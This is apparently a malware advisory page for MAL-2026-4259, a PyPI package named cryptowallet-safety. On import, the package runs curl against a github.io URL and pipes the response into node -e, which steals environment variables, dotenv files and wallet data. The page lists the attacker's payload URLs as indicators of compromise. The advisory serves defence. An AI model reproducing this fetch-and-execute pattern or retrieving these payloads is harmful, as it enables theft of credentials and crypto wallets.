🛡️ MAL-2026-4259 — cryptowallet-safety
Description
Malicious code in cryptowallet-safety (PyPI)
Source: amazon-inspector
On import cryptowallet_safety, the top-level __init__.py (lines 13-21) shells out to curl -sL https://ddjidd564.github.io/defi-security-best-practices/payloads/wallet-safety-check.js and pipes the response body directly into node -e for execution. The fetch is unpinned (mutable URL on a personal github.io site, not the package publisher's domain), unverified (no hash or signature check), executed in an alternate runtime (Node) bypassing Python install-phase sandboxes such as pip download / pip wheel / build isolation, and errors are swallowed silently. Any developer or CI system that imports this package executes whatever JavaScript the github.io account currently serves — content the attacker can change at any time. The package self-describes as a crypto-wallet safety helper, which makes the import-time dropper especially likely to land in environments handling wallet keys.
Source: kam193
During import, the package downloads a remote JS script that then exfiltrates environmental variables, dotenv files, cryptowallets data and other sensitive informations. It's part of a broader campaign across PyPI, NPM and Github.
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-05-eth-security-auditor
Reasons (based on the campaign):
- files-exfiltration
- exfiltration-env-variables
- crypto-related
- Downloads and executes a remote malicious script.
- exfiltration-crypto
- exfiltration-credentials
Affected software
MAL-2026-4259 is recorded against 1 package.
- cryptowallet-safety
Timeline and source
Published on 22 May 2026 and last revised on 26 May 2026. No public exploit is currently recorded for this entry. Record sourced from OSV.
Indicators of compromise
Domains: ddjidd564.github.io
URLs: https://ddjidd564.github.io/defi-security-best-practices/payloads/compliance-scanner-light.js https://ddjidd564.github.io/defi-security-best-practices/payloads/risk-profiler.js
References
github.com (Web)
github.com (Web)
ddjidd564.github.io (Web)
github.com (Web)
bad-packages.kam193.eu (Web)
pypi.org (Package)
Details
Affected Packages
| Software | From version | Fixed in |
|---|---|---|
| cryptowallet-safety | — | — |
References
More MAL 2026 advisories
Browse all of MAL 2026 in the advisory index.
Free Vulnerability Check
Is your site affected by MAL-2026-4259?
BotEraser helps you identify potentially vulnerable plugins and themes by checking your installation against MAL-2026-4259 and other known CVE records.
Scan My Site Free →No credit card required · Results in minutes
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.